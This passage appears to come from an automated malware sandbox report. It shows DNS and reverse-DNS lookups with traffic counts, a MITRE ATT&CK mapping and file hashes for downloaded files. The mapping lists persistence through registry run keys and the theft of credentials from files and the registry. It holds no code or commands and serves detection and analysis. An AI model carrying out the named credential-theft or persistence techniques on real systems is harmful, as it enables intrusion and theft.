56.126.166.20.in-addr.arpa
-
71 B 135 B 1 1
DNS Request
17.14.97.104.in-addr.arpa
-
71 B 135 B 1 1
DNS Request
249.197.17.2.in-addr.arpa
-
3.0kB 3.8kB 8 10
-
66 B 112 B 1 1
DNS Request
beacons.gcp.gvt2.com
DNS Response
192.178.49.163
-
3.9kB 8.2kB 10 12
-
3.3kB 9.1kB 9 11
-
73 B 111 B 1 1
DNS Request
163.49.178.192.in-addr.arpa
-
72 B 158 B 1 1
DNS Request
48.229.111.52.in-addr.arpa
-
3.3kB 7.7kB 9 10
-
2.3kB 3.6kB 8 9
MITRE ATT&CK Enterprise v15
Privilege Escalation
Boot or Logon Autostart Execution 1
Registry Run Keys / Startup Folder 1
Credential Access
Unsecured Credentials 3
Credentials In Files 2
Credentials in Registry 1
Downloads
-
Filesize
2.3MB
MD50497563e275b32e342da1989bb2cf6f2
SHA1c594939a57800487a989bc09bc9e3f899db59aea
SHA256e6524423b5e5e0da456fe7d8272a30bd8e878e70854f23674998534202c77c6b
SHA5127a2f7713ab7cfa24717f17a9e4e781ccd80b52841c6d1f5e4fa0690bd37077eb32d8bfb9ad67a319de3fc0ea11f2694423edb395fd9aa5183f4606f07d125295
-
Filesize
336B
MD5a0af34e1f3aef14293b37c023846051e
SHA17dae01f48dda550c2639ae8ee047f97be06c753a
SHA256ac42fce4ecbce007d54cfd4ea4e18d2b90ec1cd45728b93b6b55bf455ec4685c